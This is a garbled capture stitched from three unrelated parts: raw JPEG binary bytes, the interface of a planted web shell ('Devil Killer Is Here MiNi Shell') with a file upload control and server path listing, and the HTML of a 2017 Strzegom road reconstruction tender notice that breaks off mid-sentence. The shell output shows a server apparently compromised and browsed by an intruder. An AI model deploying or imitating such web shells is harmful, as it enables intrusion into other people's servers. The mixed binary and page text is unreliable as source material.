JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170113/8117-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://bip.strzegom.pl/public/' target='_blank'>http://bip.strzegom.pl/public/</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 8117 - 2017
              z dnia 2017-01-13 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Strzegom: PRZEBUDOWA DRÓG GMINNYCH W STRZEGOMIU: 
UL. PADEREWSKIEGO, MATEJKI ŁĄCZĄCYCH SIĘ Z DROGĄ WOJEWÓDZKĄ NR 374
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Strzegom, krajowy numer identyfikacyjny
              89071837200000, ul.
              ul. Rynek 
              38,
              58150  
              Strzegom, woj.
              dolnośląskie, państwo
              Polska, tel.
              (074)  856-05-99, e-mail
              strzegom@strzegom.pl, faks
              (074 ) 856-05-16.
              <br />
              Adres strony internetowej (URL): www.strzegom.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />http://bip.strzegom.pl/public/</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />http://bip.strzegom.pl/public/</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />Oferty można składać osobiście lub przesłać pocztą za potwierdzeniem odbioru na adres Zamawiającego<br />
                Adres:
                <br />GMINA STRZEGOM, 58-150 Strzegom RYNEK 38</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>PRZEBUDOWA DRÓG GMINNYCH W STRZEGOMIU: 
UL. PADEREWSKIEGO, MATEJKI ŁĄCZĄCYCH SIĘ Z DROGĄ WOJEWÓDZKĄ NR 374
<br /><b>Numer referencyjny: </b>WIiZP.271.2.2017.MP<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b><br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  
                    maksymalnej liczby części 2<br /></div><b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b><br />wykonawca może złożyć ofertę na Część I i Część II lub tylko na Cześć I lub tylko na Część II<br /><b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b><br />2<br /><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>Przedmiotem zamówienia jest przebudowa dróg gminnych w Strzegomiu: ul. Paderewskiego, Matejki łączących się z drogą wojewódzką nr 374.

Przedmiot zamówienia jest podzielony na dwie części, które obejmują:

CZĘŚĆ I: PRZEBUDOWA UL. PADEREWSKIEGO W STRZEGOMIU
CZĘŚĆ II: PRZEBUDOWA UL. MATEJKI W STRZEGOMIU

Zamawiający dopuszcza częściowe składanie ofert tj. wykonawca może złożyć ofertę na Część I 
i Część II lub tylko na Cześć I lub tylko na Część II

2.1. CZĘŚĆ I: PRZEBUDOWA UL. PADEREWSKIEGO W STRZEGOMIU

2.1.1. ZADANIE 1 obejmuje przebudowę ul. Paderewskiego w Strzegomiu od skrzyżowania 
z ul. Legnicką do Rynku - zakres robót w pasie drogowym objęty jest dofinansowaniem 
w ramach programu wieloletniego pod nazwą ,,PROGRAM ROZWOJU GMINNEJ 
I POWIATOWEJ INFRASTRUKTURY DROGOWEJ NA LATA 2016-2019.

Zakres robót obejmuje między innymi wykonanie:
- przesadzenie 5-ciu sztuk drzew na działkę nr 1682 AM-15 obręb śródmieście. Przesadzenie należy dokonać w porozumieniu z pracownikiem Wydziału Gospodarki Komunalnej Ochrony Środowiska i Wsi Urzędu Miejskiego w Strzegomiu. 
- usunięcie 1 sztuki drzewa znajdującego się na przeciwko budynku ul. Paderewskiego 28, wraz 
z karczowaniem, pocięciem dłużyc na 1m kawałki i przekazaniem do Zakładu Usług Komunalnych Sp. z o.o. w Strzegomiu, 
-  robót rozbiórkowych i demontażowych,
-  korytowania, profilowania i zagęszczania podłoża, podbudowy,
- nowej nawierzchni jezdni z kostki granitowej i betonu asfaltowego,
- ścieku przykrawężnikowego z kostki granitowej,
- miejsc postojowych z kostki granitowej, oddzielonych rzędem kostki bazaltowej,
- zjazdów z kostki granitowej,
- ścieżki rowerowej z betonu asfaltowego,
- chodników z kostki granitowej oraz płyt granitowych,
- chodników z kostki betonowej,
- wyspy wyniesionej na skrzyżowaniu ul. Paderewskiego z ul. Bankową, 
- krawężników granitowych,
- regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni wraz 
z wymianą skrzynek, obudów i zaworów, 
- wykonanie zabudowy okienek piwnicznych, 
- kanalizacji deszczowej,
- przebudowa istniejącego oświetlenia ulicznego,
-wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 5 września 2016 r. znak: KD.7121.2.156.2016.2,
- wykonawca robót na 7 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić 
o tym fakcie Starostwo Powiatowe w Świdnicy.
- wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 1128/2016 z dnia 8 września 2016 roku znak:WB.6740.1043.2016.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego.
- wykonanie nowego oznakowania pionowego i poziomego wg zatwierdzonego przez  
  Starostwo Powiatowe w Świdnicy projektu oznakowania stałego.
- materiały z rozbiórki zjazdów, chodników oraz krawężników należy przekazać Zamawiającemu 
i przewieźć w miejsce wskazane do 2 km.

2.1.2. ZADANIE 2 obejmuje likwidację kolizji z siecią telekomunikacyjną oraz montaż koszy na śmieci oraz pojemników na psie odchody na ul. Paderewskiego w Strzegomiu- zakres robót nie objęty dofinansowaniem. 

Zakres robót obejmuje między innymi wykonanie:
- przesunięcie studni kablowych przy przebudowie, studnia SK-1,
- montaż koszy na śmieci oraz pojemników na psie odchody,

2.1.3. Kod i nazwa zamówienia według Wspólnego Słownika Zamówień (CPV):

   -45110000-1 -  Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty  
 		    ziemne
-45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania  
                        nawierzchni autostrad, dróg
-45233140-2 - Roboty drogowe
-45233290-8  Instalowanie znaków drogowych
-45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych
-45316110-9  Instalowanie drogowego sprzętu oświetleniowego
  - 45231000-5 -  Roboty budowlane w zakresie budowy rurociągów, ciągów  
                            komunikacyjnych i linii energetycznych
  - 32412100-5 - Sieć telekomunikacyjna

2.1.4. Dokumenty związane:
A) ul. Paderewskiego
- projekt budowlany Przebudowa ul. Paderewskiego w Strzegomiu w ramach zadania: ,,Przebudowa dróg gminnych w Strzegomiu: Paderewskiego, Matejki łączących się z drogą wojewódzką nr 374, branża drogowa, instalacyjna, elektryczna, teletechniczna,
- projekt wykonawczy Przebudowa ul. Paderewskiego w Strzegomiu w ramach zadania: ,,Przebudowa dróg gminnych w Strzegomiu: Paderewskiego, Matejki łączących się z drogą wojewódzką nr 374, branża drogowa, instalacyjna, elektryczna, teletechniczna,
- projekt stałej organizacji ruchu,
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych  branża drogowa, instalacyjna, elektryczna, telekomunikacyjna,
-  pozwolenie na budowę - Decyzja Nr 1128/2016 z dnia 8 września 2016 roku znak:WB.6740.1043.2016.3 wydana przez Starostę Świdnickiego,
- opinia geotechniczna wykonana w sierpniu 2016,
- UWAGA: Gmina Strzegom jest na etapie uzyskiwania zezwolenia na przesadzenie oraz  usunięcie drzew.

2.2. CZĘŚĆ II: PRZEBUDOWA UL. MATEJKI W STRZEGOMIU

2.2.1. ZADANIE 1 obejmuje przebudowę ul. Matejki w Strzegomiu od skrzyżowania 
z ul. Kościuszki do skrzyżowania z ul. Paderewskiego - zakres robót w pasie drogowym objęty jest dofinansowaniem w ramach programu wieloletniego pod nazwą ,,PROGRAM ROZWOJU GMINNEJ I POWIATOWEJ INFRASTRUKTURY DROGOWEJ NA LATA 2016-2019.
 
Zakres robót obejmuje między innymi wykonanie:
-  robót rozbiórkowych i demontażowych,
-  korytowania, profilowania i zagęszczania podłoża, podbudowy,
- nowej nawierzchni jezdni z betonu asfaltowego,
- ścieku przykrawężnikowego z kostki granitowej,
- zjazdów z kostki granitowej,
- ścieżki rowerowej z betonu asfaltowego,
- chodników z kostki betonowej,
- krawężników granitowych,
- regulacji wysokościowej wszystkich urządzeń obcych do nowoprojektowanej nawierzchni wraz 
z wymianą skrzynek, obudów i zaworów, 
- wykonanie zabudowy okienek piwnicznych, 
- kanalizacji deszczowej,
- budowy oświetlenia ulicznego,
-wprowadzenie docelowej organizacji ruchu zgodnie z zatwierdzonym projektem przez Starostę Świdnickiego - zatwierdzenie z dnia 5 września 2016 r. znak: KD.7121.2.156.2016.2, -wykonawca robót na 7 dni przed dniem wprowadzenia organizacji ruchu musi powiadomić o tym fakcie Starostwo Powiatowe w Świdnicy,
-wymagane jest prowadzenie robót zgodnie z  Decyzją Nr 1129/2016 z dnia 8 września 2016 roku znak:WB.6740.1044.2016.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego,
- wykonanie nowego oznakowania pionowego i poziomego wg zatwierdzonego przez  
  Starostwo Powiatowe w Świdnicy projektu oznakowania stałego.
- materiały z rozbiórki zjazdów oraz chodników należy przekazać Zamawiającemu i przewieźć 
w miejsce wskazane do 2 km.

2.2.2. ZADANIE 2 obejmuje likwidację kolizji z siecią telekomunikacyjną na ul. Matejki 
w Strzegomiu - zakres robót nie objęty dofinansowaniem. 

Zakres robót obejmuje między innymi wykonanie:
- budowa kanalizacji,
- budowa studni kablowych,
- przełączenie kabla miedzianego,
- zabezpieczenie kanalizacji.

2.2.3. Kod i nazwa zamówienia według Wspólnego Słownika Zamówień (CPV):

    -45110000-1 - Roboty w zakresie burzenia i rozbiórki obiektów budowlanych; roboty  
 		    ziemne
-45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania  
                        nawierzchni autostrad, dróg
-45233140-2 - Roboty drogowe
-45233290-8  Instalowanie znaków drogowych
-45231400-9 - Roboty budowlane w zakresie budowy linii energetycznych
-45316110-9  Instalowanie drogowego sprzętu oświetleniowego
  - 45231000-5 -  Roboty budowlane w zakresie budowy rurociągów, ciągów  
                            komunikacyjnych i linii energetycznych
  - 32412100-5 - Sieć telekomunikacyjna

2.2.4. Dokumenty związane:
A) ul. Matejki
- projekt budowlany Przebudowa ul. Matejki w Strzegomiu w ramach zadania: ,,Przebudowa dróg gminnych w Strzegomiu: Paderewskiego, Matejki łączących się z drogą wojewódzką 
nr 374, branża drogowa, instalacyjna, elektryczna, teletechniczna,
- projekt wykonawczy Przebudowa ul. Matejki w Strzegomiu w ramach zadania: ,,Przebudowa dróg gminnych w Strzegomiu: Paderewskiego, Matejki łączących się z drogą wojewódzką nr 374, branża drogowa, instalacyjna, elektryczna, teletechniczna,
- projekt stałej organizacji ruchu,
- Specyfikacja Techniczna Wykonania i Odbioru Robót Budowlanych  branża drogowa, instalacyjna, elektryczna, telekomunikacyjna
     - pozwolenie na budowę - Nr 1129/2016 z dnia 8 września 2016 roku znak:  
       WB.6740.1044.2016.3 o pozwoleniu na budowę wydaną przez Starostę Świdnickiego.
- opinia geotechniczna wykonana w sierpniu 2016.

2.3. OPIS dotyczący  CZĘŚCI I i CZĘŚCI II
2.3.1. Kostka kamienna i betonowa, krawężniki kamienne, płyty betonowe oraz znaki z rozbiórek przewidziane są do odzysku. Wykonawca przekaże je zamawiającemu tj. (złoży krawężniki, kostkę, płyty betonowe na paletach) w miejscu wskazanym przez zamawiającego.  W cenie oferty należy przewidzieć sortowanie zwarzenie i transport w/w elementów na odległość do 2 km.
2.3.2. Kosze na śmieci należy zdemontować i przekazać do Zakładu Usług Komunalnych 
w Strzegomiu Sp. z o.o., Al. Wojska Polskiego 75. 
2.3.3. Oprawy oświetleniowe pochodzące z demontażu należy przekazać protokolarnie do Zakładu Usług Komunalnych w Strzegomiu Sp. z o.o., Al. Wojska Polskiego 75.
2.3.4. Istniejący parkomat należy przestawić przy targowisku w miejscu wskazanym przez zamawiającego.
2.3.5. Kratki oraz włazy z demontażu należy przekazać protokolarnie do Zakładu Usług Komunalnych w Strzegomiu Sp. z o.o., Al. Wojska Polskiego 75.
2.3.6. Szczegółowy zakres prac objętych niniejszym zamówieniem znajduje się w dokumentacji technicznej (projekty budowlane i wykonawcze, przedmiary robót, STWiORB), stanowiącej Załącznik do SIWZ. Przedmiot zamówienia należy wykonać zgodnie z SIWZ w/w dokumentacją oraz obowiązującymi przepisami i normami. 
2.3.7. UWAGA! Przedmiary robót mają charakter pomocniczy. Wykonawca zobowiązany jest do dokładnego sprawdzenia ilości robót z dokumentacją projektową. Z uwagi na to, że w ramach niniejszego zamówienia przewidziane jest rozliczenie ryczałtowe w przypadku wystąpienia 
w trakcie prowadzenia robót większej ilości robót w jakiejkolwiek pozycji przedmiarowej nie będzie to mogło być uznane za roboty dodatkowe z żądaniem dodatkowego wynagrodzenia. Przedmiary robót stanowiące załączniki do specyfikacji  należy traktować  jako element  dodatkowy, ułatwiający sporządzenie oferty.  Przedmiar robot nie może stanowić podstawy wyceny przedmiotu zamówienia. 
Roboty ujęte w dokumentacji a nie ujęte w wycenie nie będą traktowane jako roboty dodatkowe 
i nie będą  finansowane przez  Zamawiającego. W przypadku pominięcia przez Wykonawcę przy sporządzaniu oferty jakichkolwiek robót lub kosztów określonych lub zasygnalizowanych 
w dokumentacji przetargowej i ich nie ujęcia w wynagrodzeniu ryczałtowym, Wykonawcy nie będzie przysługiwało względem Zamawiającego żadne roszczenie z powyższego tytułu, 
a w szczególności roszczenie o dodatkowe wynagrodzenie.  
Ewentualny brak, w przedmiarze robót elementów rozliczeniowych wynikających z dokumentacji projektowej nie zwalnia wykonawcy od obowiązku ich wykonania na podstawie projektu w cenie umownej. 
2.3.8. Wykonawca zobowiązany jest udzielić gwarancji i rękojmi na wykonane roboty budowlane na okres wskazany w formularzu oferty. Minimalny okres gwarancji i rękojmi wynosi 36 miesięcy, maksymalny okres gwarancji i rękojmi wynosi 60 miesięcy od dnia podpisania protokołu odbioru końcowego. Wykonawca zobowiązany jest również udzielić gwarancji na wbudowane materiały, elementy i zamontowane oraz dostarczone urządzenia na okres jak w udzielonej gwarancji na roboty budowlane.
2.3.9. Wykonawca odpowiedzialny jest za całokształt, w tym: za przebieg i terminowe wykonanie zamówienia, za jakość, zgodność z warunkami technicznymi i jakościowymi - określonymi dla przedmiotu zamówienia, spełnienie innych wymagań wynikających z obowiązujących przepisów prawa. Wykonawca ponosi pełną odpowiedzialność za realizację zadania.
2.3.10. W przypadku stwierdzenia, że prace wykonywane są niezgodnie z obowiązującymi przepisami Zamawiający może odstąpić od zapłaty i zażądać ich ponownego wykonania lub odstąpić od umowy z winy Wykonawcy.
2.3.11. Zakres prac oraz odpowiedzialność Wykonawcy w zakresie objętym proponowaną ceną ofertową obejmuje także:
  2.3.11.1. organizację, zabezpieczenie, ubezpieczenie i zagospodarowanie placu budowy, 
  2.3.11.2. zorganizowanie i przeprowadzenie niezbędnych prób, badań i odbiorów,
  2.3.11.3. doprowadzenie placu budowy do należytego stanu  i porządku po zakończeniu robót, 
              wywiezienie gruzu na  składowisko odpadów  i utylizację odpadów  budowlanych,
2.3.11.4. projekt organizacji ruchu na czas trwania robót, 
2.3.11.5. utrzymanie porządku w trakcie realizacji robót oraz systematyczne porządkowanie   
            miejsca wykonywania robót,
2.3.11.6. demontaż obiektów tymczasowych,
2.3.11.7. uczestniczenie w wyznaczonych przez Zamawiającego spotkaniach i naradach 
w celu omówienia spraw związanych z realizacją zadania oraz w okresie gwarancji 
i rękojmi,
   2.3.11.8. Wykonawca zobowiązany jest do informowania z odpowiednim wyprzedzeniem dysponentów sieci (w tym m in.: TAURON Dystrybucja S.A., Wodociągi 
i Kanalizacja Sp. z o.o. z siedzibą w Strzegomiu,  Telefonia DIALOG   Sp. z o.o., ORANGE POLSKA SA,  Dolnośląska Spółka Gazownictwa sp. z o.o. Oddział Zakład Gazowniczy Wałbrzych), o zamierzonych terminach rozpoczęcia robót. Po wykonaniu prac, lecz przed ich zakryciem,  należy je zgłosić do odbioru wpisem do dziennika budowy oraz uzyskać protokolarny odbiór potwierdzony przez przedstawiciela zakładu branżowego. Wykonawca zobowiązuje się do ścisłej współpracy z w/w dysponentami sieci podczas wykonywania przez nich prac. 
2.3.12. Wykonawca zobowiązany będzie do udostępnienia placu budowy firmie TAURON Dystrybucja S.A., Polskiej Spółce Gazownictwa Sp. z o.o. Oddział we Wrocławiu, Zakład 
w Wałbrzychu, Wodociągom i Kanalizacji Sp. z o.o. w Strzegomiu.
2.3.13. Wykonawca powinien zapewnić dostęp do posesji zlokalizowanych przy przebudowywanych ulicach również w trakcie realizacji inwestycji.
2.3.14. Roboty należy prowadzić zgodnie z przepisami Prawa budowlanego i przepisami BHP. Wykonawca jest zobowiązany posiadać decyzję zatwierdzającą program gospodarki odpadami zgodnie z ustawą z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2016 r., poz. z późn. zm.).
2.3.15. Zamawiający zapewnia nadzór inwestorski.
2.3.16. Obsługa geodezyjna przedsięwzięcia jest po stronie Wykonawcy robót. Wykonawca przedłoży Zamawiającemu mapy inwentaryzacji geodezyjnej powykonawczej oddzielnie dla Części I i Części II:
2.3.16.1 na co najmniej 4 dni przed dokonaniem odbioru końcowego:
- mapy inwentaryzacji geodezyjnej powykonawczej w czterech egzemplarzach z potwierdzeniem przez Starostwo Powiatowe w Świdnicy -  Powiatowe Biuro Geodezji i Katastru, że zostały przyjęte do państwowego zasobu geodezyjnego i kartograficznego,
- szkice geodezyjne powykonawcze w czterech egzemplarzach (oddzielnie dla każdej z dróg - wg zakresu pozwoleń na budowę),
2.3.16.2 szkice robocze geodezyjne na zakończenie etapu realizacji robót, zgodnie 
z harmonogramem realizacji robót.
Zamawiający nie wskazuje lokalizacji i współrzędnych punktów głównych trasy oraz reperów 
w terenie. Na Wykonawcy spoczywa odpowiedzialność za ochronę punktów pomiarowych do chwili odbioru końcowego robót. Uszkodzone lub zniszczone znaki geodezyjne Wykonawca odtworzy i utrwali na własny koszt.
2.3.17. Opłaty za nadzory jednostek branżowych leżą po stronie Wykonawcy.
2.3.18. Zamawiający wymaga bezwzględnej obecności na budowie kierownika robót, posiadającego uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej 
w zakresie sieci elektrycznych i energetycznych w każdy dzień roboczy, w którym prowadzone będą roboty z zakresu przebudowy oświetlenia drogowego. 
2.3.19. Wykonawca przed podpisaniem umowy uzgodni harmonogram rzeczowo-terminowo-finansowy, który stanowił będzie Załącznik do umowy z Zamawiającym.

2.3.20. Podana w ofercie cena  ofertowa musi obejmować koszty wykonania robót wynikających 
